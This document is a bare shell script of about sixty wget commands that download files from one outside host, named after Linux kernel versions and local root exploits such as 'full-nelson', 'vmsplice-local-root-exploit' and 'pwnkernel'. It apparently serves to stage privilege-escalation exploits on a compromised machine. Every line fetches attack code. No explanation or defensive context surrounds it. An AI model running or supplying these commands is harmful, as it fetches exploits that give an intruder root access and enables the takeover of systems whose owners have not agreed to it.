wget http://www.oco.cc/root/1-2
wget http://www.oco.cc/root/1-3
wget http://www.oco.cc/root/1-4
wget http://www.oco.cc/root/2
wget http://www.oco.cc/root/2-1
wget http://www.oco.cc/root/2-6-32-46-2011
wget http://www.oco.cc/root/2-6-37
wget http://www.oco.cc/root/2.6.18-6-x86-2011
wget http://www.oco.cc/root/2.6.18-164-2010
wget http://www.oco.cc/root/2.6.18-194
wget http://www.oco.cc/root/2.6.18-194.1-2010
wget http://www.oco.cc/root/acid
wget http://www.oco.cc/root/2.6.18-194.2-2010
wget http://www.oco.cc/root/2.6.18-274-2011
wget http://www.oco.cc/root/2.6.18-374.12.1.el5-2012
wget http://www.oco.cc/root/2.6.28-2011
wget http://www.oco.cc/root/2.6.32-46.1.BHsmp
wget http://www.oco.cc/root/2.6.33
wget http://www.oco.cc/root/2.6.33-2011
wget http://www.oco.cc/root/2.6.34-2011Exploit1
wget http://www.oco.cc/root/2.6.34-2011Exploit2
wget http://www.oco.cc/root/2.6.37
wget http://www.oco.cc/root/2.6.37-rc2
wget http://www.oco.cc/root/2.34-2011Exploit1
wget http://www.oco.cc/root/3
wget http://www.oco.cc/root/4
wget http://www.oco.cc/root/5
wget http://www.oco.cc/root/6
wget http://www.oco.cc/root/7
wget http://www.oco.cc/root/7-2
wget http://www.oco.cc/root/7x
wget http://www.oco.cc/root/8
wget http://www.oco.cc/root/9
wget http://www.oco.cc/root/10
wget http://www.oco.cc/root/11
wget http://www.oco.cc/root/13x
wget http://www.oco.cc/root/14
wget http://www.oco.cc/root/15.sh
wget http://www.oco.cc/root/16
wget http://www.oco.cc/root/16-1
wget http://www.oco.cc/root/18
wget http://www.oco.cc/root/18-5
wget http://www.oco.cc/root/31
wget http://www.oco.cc/root/36-rc1
wget http://www.oco.cc/root/44
wget http://www.oco.cc/root/15150
wget http://www.oco.cc/root/15200
wget http://www.oco.cc/root/exp1
wget http://www.oco.cc/root/exp2
wget http://www.oco.cc/root/exp3
wget http://www.oco.cc/root/exploit
wget http://www.oco.cc/root/full-nelson
wget http://www.oco.cc/root/gayros
wget http://www.oco.cc/root/lenis.sh
wget http://www.oco.cc/root/local-root-exploit-gayros
wget http://www.oco.cc/root/pwnkernel
wget http://www.oco.cc/root/root1
wget http://www.oco.cc/root/root.py
wget http://www.oco.cc/root/runx
wget http://www.oco.cc/root/tivoli
wget http://www.oco.cc/root/ubuntu
wget http://www.oco.cc/root/vmsplice-local-root-exploit
wget http://www.oco.cc/root/z1d-2011
